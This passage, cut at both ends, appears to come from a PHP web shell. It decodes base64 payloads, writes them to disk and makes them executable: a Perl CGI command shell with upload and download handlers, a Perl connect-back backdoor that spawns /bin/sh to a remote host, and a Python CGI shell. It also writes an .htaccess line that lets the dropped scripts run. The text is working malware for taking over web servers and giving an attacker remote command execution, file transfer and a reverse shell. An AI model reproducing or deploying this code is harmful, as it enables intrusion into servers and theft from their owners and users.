- bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
- aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
- Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
- c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
- ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
- bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
- ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
- Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
- eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
- dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
- KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
- JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
- PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
- dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
- ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
- b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
- DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
- CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
- DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
- ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
- bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
- IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
- ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
- KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
- DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
- RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
- ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
- VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
- ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
- IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
- RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
- YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
- ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
- DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
- ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
- IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
- Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
- aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
- IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
- dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
- aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
- XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
- YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
- CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
- Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
- UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
- aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
- bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
- CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
- d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
- aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
- LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
- cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
- DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
- cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
- DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
- c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
- bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
- YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
- bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
- Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
- aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
- aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
- dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
- bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
- YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
- cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
- CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
- aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
- cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
- bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
- IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
- IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
- ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
- ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
- Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
- ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
- ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
- ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
- IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
- aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
- ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
- JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
- ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
- PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
- Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
- CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
- dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
- Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
- IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
- CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
- SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
- c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
- ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
- Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
- ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
- bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
- cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
- ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
- b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
- b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
- dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
- ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
- bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
- bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
- b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
- $file = fopen("izo.cin" ,"w+");
- $write = fwrite ($file ,base64_decode($cgishellizocin));
- fclose($file);
- chmod("izo.cin",0755);
- $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
- MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
- ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
- MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
- ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
- MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
- Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
- KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
- SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
- ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
- UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
- VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
- ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
- JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
- bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
- ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
- YXRhY2hlZFxuXG4iOw==';
- $file = fopen("dc.pl" ,"w+");
- $write = fwrite ($file ,base64_decode($netcatshell));
- fclose($file);
- chmod("dc.pl",0755);
- echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_7":
- mkdir('python', 0755);
- chdir('python');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "AddHandler cgi-script .izo";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
- IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
- b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
- cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
- ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
- Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
- Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
- YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
- ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
- OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
- dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
- dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
- b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
- aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
- c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
- NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
- PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
- VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
- cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
- IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
- aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
- dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
- Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
- d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
- aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
- ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
- XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
- W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
- cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
- PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
- IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
- ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
- aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
- CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
- ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
- cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
- ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
- Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
- IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
- dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
- ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
- IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
- cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
- IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
- ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
- YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
- KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
- aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
- PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
- PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
